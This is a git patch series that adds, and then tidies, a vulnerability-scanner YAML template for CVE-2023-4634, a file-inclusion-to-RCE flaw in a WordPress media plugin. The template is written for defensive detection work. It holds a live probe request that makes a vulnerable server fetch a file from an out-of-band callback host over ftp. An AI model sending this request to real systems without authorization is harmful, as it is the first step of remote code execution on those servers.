From 7534ad59ac5b0a85322338885765c030f892a1e9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 19:00:09 +0530 Subject: [PATCH 1/3] Create CVE-2023-4634.yaml --- http/cves/2023/CVE-2023-4634.yaml | 37 +++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4634.yaml diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml new file mode 100644 index 0000000000..3694a6c7e6 --- /dev/null +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-4634 + +info: + name: Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion + author: Pepitoh,ritikchaddha + severity: critical + description: | + A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. + remediation: Fixed in version 3.09 + reference: + - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ + - https://cve.report/CVE-2023-4634 + classification: + cve-id: CVE-2023-4634 + metadata: + max-request: 1 + verified: true + publicwww-query: "wp-content/plugins/media-library-assistant" + tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt" + - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg" + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "Media Library Assistant" + + - type: word + part: interactsh_protocol + words: + - "dns" From fc0dcf0ea7926c237c0668cc0b80d426f8f1dd7b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 19:02:19 +0530 Subject: [PATCH 2/3] update metadata & ref --- http/cves/2023/CVE-2023-4634.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 3694a6c7e6..c45ff1abfa 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -9,14 +9,15 @@ info: remediation: Fixed in version 3.09 reference: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ + - https://fr.wordpress.org/plugins/media-library-assistant/advanced/ - https://cve.report/CVE-2023-4634 classification: cve-id: CVE-2023-4634 metadata: - max-request: 1 + max-request: 2 verified: true publicwww-query: "wp-content/plugins/media-library-assistant" - tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce + tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant http: - method: GET From 09275ac9978b63f53f7646cbb5a6cd831b468ceb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 19:03:32 +0530 Subject: [PATCH 3/3] lint fix --- http/cves/2023/CVE-2023-4634.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index c45ff1abfa..59eb930a09 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -5,7 +5,7 @@ info: author: Pepitoh,ritikchaddha severity: critical description: | - A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. + A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. remediation: Fixed in version 3.09 reference: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/